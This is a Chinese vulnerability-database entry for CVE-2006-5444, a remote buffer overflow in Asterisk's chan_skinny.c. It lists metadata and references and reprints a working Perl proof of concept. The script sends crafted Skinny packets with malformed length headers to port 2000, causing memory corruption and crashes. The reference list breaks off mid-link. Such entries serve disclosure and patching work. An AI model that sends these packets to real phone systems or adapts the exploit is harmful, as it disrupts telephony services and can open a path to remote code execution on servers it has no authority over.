Asterisk 'chan_skinny.c'远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111335 漏洞类型 缓冲区溢出
发布时间 2006-10-19 更新时间 2007-01-15
CVE编号 CVE-2006-5444 CNNVD-ID CNNVD-200610-381
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2597
https://www.securityfocus.com/bid/20617
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-381
|漏洞详情
Asterisk是一款PBX系统的软件,运行在Linux系统上,支持使用SIP、IAX、H323协议进行IP通话。Asterisk的chan_skinny.c文件中的staticintget_input(structskinnysession*s)函数没有正确地验证报文头中用户所提供的长度。远程攻击者可以通过发送特制报文来触发缓冲区溢出漏洞,导致执行任意指令。
|漏洞EXP
#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept causes the chan_skippy to crash in different locations and due to
# memory corruption as well as double free calls, this is based on the finding of
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
#

use IO::Socket;
use strict;

my $target = "127.0.0.1";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");

unless ($remote) { die "cannot connect to skinny daemon on $target" }

my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
#[Switching to Thread -1494127696 (LWP 9909)]
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);

print $remote $packet;

# milw0rm.com [2006-10-19]
|受影响的产品
S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S
|参考资料

来源:VU#521252
名称:VU#521252
链接:http://www.kb.cert.org/vuls/id/521252
来源:BID
名称:20617
链接:http://www.securityfocus.com/bid/20617
来源:BUGTRAQ
名称:20061018Security-Assessment.comAdvisory:Asteriskremoteheapoverflow
链接:http://www.securityfocus.com/archive/1/archive/1/449127/100/0/threaded
来源:VUPEN
名称:ADV-2006-4097
链接:http://www.frsirt.com/english/advisories/2006/4097
来源:www.asterisk.org
链接:http://www.asterisk.org/node/109
来源:SECTRACK
名称:1017089
链接:http://securitytracker.com/id?1017089
来源:SECUNIA
名称:22480
链接:http://secunia.com/advisories/22480
来源:ftp.digium.com
链接:http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13
来源:ftp.digium.com
链接:http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12
来源:OPENPKG
名称:OpenPKG-SA-2006.024
链接:http://www.securityfocus.com/archive/1/archive/1/449183/100/0/threaded
来源:XF
名称:asterisk-getinput-code-execution(29663)
链接:http://xforce.iss.net/xforce/xfdb/29663
来源:DEBIAN
名称:DSA-1229
链接:http://www.us.debian.org/security/2006/dsa-1229
来源:OSVDB
名称:29972
链接:ht